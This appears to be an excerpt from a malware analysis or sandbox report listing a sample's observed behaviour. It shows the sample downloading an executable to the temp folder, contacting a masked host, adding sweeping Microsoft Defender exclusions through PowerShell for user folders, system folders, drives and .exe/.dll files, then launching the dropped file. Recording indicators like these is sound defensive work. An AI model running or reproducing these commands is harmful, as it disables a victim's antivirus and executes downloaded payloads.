Technical Information
- https://example.com/download.exe as %temp%\file.exe
- 'ex##ple.com':443
- 'ex##ple.com':443
- DNS ASK ex##ple.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell -Command Add-MpPreference -ExclusionPath @('%UserProfile%','%AppData%','%Temp%','%SystemRoot%','%HomeDrive%','%SystemDrive%') -Force & powershell -Command Add-MpPreference -Exclus...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath @('%HOMEPATH%','%APPDATA%','%LOCALAPPDATA%\Temp','%WINDIR%','C:','C:') -Force
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath '%TEMP%\File.exe'